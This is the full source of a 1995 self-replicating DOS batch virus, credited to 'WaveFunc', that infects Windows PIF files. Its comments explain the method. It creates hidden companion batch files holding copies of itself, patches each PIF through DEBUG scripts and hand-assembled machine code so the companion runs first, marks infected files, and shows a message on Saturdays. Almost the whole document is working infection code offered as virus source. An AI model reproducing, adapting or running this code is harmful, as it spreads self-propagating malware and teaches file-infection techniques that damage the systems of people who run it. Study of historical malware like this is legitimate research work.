Windows PIF Virus - WaveFunc May 13, 1995 - Source Code

1. :: Windows PIF Virus (in batch!)
2. :: Prog by WaveFunc May 13, 1995
3. :: (these comments will not replicate)
4. ::
5. :: This is a virus that 'infects' PIF files, used by Windows to
6. :: run DOS programs. It works by creating hidden companion batches
7. :: containing copies of this then altering the PIF file so that the
8. :: companion batch runs first. After the companion runs it runs the
9. :: original host program, the name of which is encoded into the
10. :: companion. The pif files are marked so that they will not be
11. :: re-infected. Only PIFs are affected, no changes are made to
12. :: the infected programs. To 'cure', use PIFEDIT to restore the
13. :: original filenames then delete the hidden files.
14. ::
15. @echo off
16. :: host filename...
17. set pifvo=LIST.COM
18. :: loop dispatcher...
19. if '%1=='PiFV goto PiFV_%2
20. :: run the virus!
21. set _PiFV=
22. if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV%
23. %comspec% /e:5000 /c %0 PiFV go>nul
24. if exist PiFV! del PiFV!
25. :: run the host
26. set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
27. call %0 PiFV hst
28. set PiFVo=
29. set PiFVcl=
30. :: check for activation...
31. echo.|date|find /i "sat">nul.PiFV
32. if errorlevel 1 goto PiFV_end
33. echo.|time|find "7">nul.PiFV
34. if errorlevel 1 goto PiFV_msg
35. set PiFV=echo
36. cls%_PiFV%
37. %PiFV%.
38. %PiFV% There once was an Otter named Oscer
39. %PiFV% Who claimed to know how to make water.
40. %PiFV% "No more dams," he said, "use my water instead!"
41. %PiFV% But the Elder Otter was not impressed.
42. pause>nul.PiFV
43. set PiFV=
44. goto PiFV_end
45. :PiFV_msg
46. echo [PiFV] by WaveFunc
47. goto PiFV_end
48. :PiFV_hst
49. %PiFVo% %PiFVcl%
50. goto PiFV_end
51. :PiFV_go
52. set PiFVh=%0
53. if not exist %PiFVh% set PiFVh=%0.bat
54. if not exist %PiFVh% exit
55. for %%a in (*.pif) do call %0 PiFV inf %%a
56. exit PiFV
57. :PiFV_inf
58. set PiFVp=%3
59. :: get victim filename and infection marker
60. :: from PIF file using debug...
61. if exist PiFV! goto PiFV_1
62. echo m 124,162 524>PiFV!
63. echo e 100 '@set fn='>>PiFV!
64. echo m 524,562 108>>PiFV!
65. echo n pifv$.bat>>PiFV!
66. echo rcx>>PiFV!
67. echo 47>>PiFV!
68. echo w>>PiFV!
69. echo m 55E,561 108>>PiFV!
70. echo e 10C 0>>PiFV!
71. echo n pifv$$.bat>>PiFV!
72. echo rcx>>PiFV!
73. echo 10>>PiFV!
74. echo w>>PiFV!
75. echo q>>PiFV!
76. :PiFV_1
77. debug %PiFVp%<PiFV!>nul
78. call PiFV$
79. set PiFVn=%fn%
80. call PiFV$$
81. set PiFVi=%fn%
82. del PiFV$?.bat
83. :: pifvn=orig filename
84. :: pifvi=infection marker
85. :: pifvp=pif filename
86. :: pifvh=companion bat file
87. :: skip infected or 'empty' pifs...
88. if '%PiFVi%=='PiFV goto PiFV_end
89. if '%PiFVn%==' goto PiFV_end
90. :: don't shadow command.com (be nice)
91. echo %PiFVn%|find /i "command">nul
92. if not errorlevel 1 goto PiFV_end
93. :: infectable - create a companion batch...
94. :: (the following code strips off the extension)
95. echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$
96. echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$
97. echo e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$
98. echo n pifv$.com>>PiFV$$
99. echo rcx>>PiFV$$
100. echo 2a>>PiFV$$
101. echo w>>PiFV$$
102. echo q>>PiFV$$
103. debug<PiFV$$>nul
104. echo %PiFVn%|PiFV$>PiFV$$.bat
105. call PiFV$$
106. set PiFVb=%fn%.bat
107. del PiFV$?.*
108. :: pifvb=new batch name
109. :: do not shadow if comp has same name as host
110. if %PiFVo%==%PiFVb% goto PiFV_end
111. if exist %PiFVb% goto PiFV_end
112. echo @echo off>%PiFVb%
113. echo set pifvo=%pifvn%>>%PiFVb%
114. find "PiFV"<%PiFVh%>>%PiFVb%
115. attrib %PiFVb% +h
116. :: ...and point the PIF at the companion
117. echo e 15E 'PiFV',0>PiFV$$
118. echo e 124 '%PiFVb%',0>>PiFV$$
119. echo w>>PiFV$$
120. echo q>>PiFV$$
121. debug %PiFVp%<PiFV$$>nul
122. del PiFV$$
123. :: I think we're done!
124. exit PiFV
125. :PiFV_end
126. :: wonder how many bugs all this has in it? Only one
127. :: way to find out...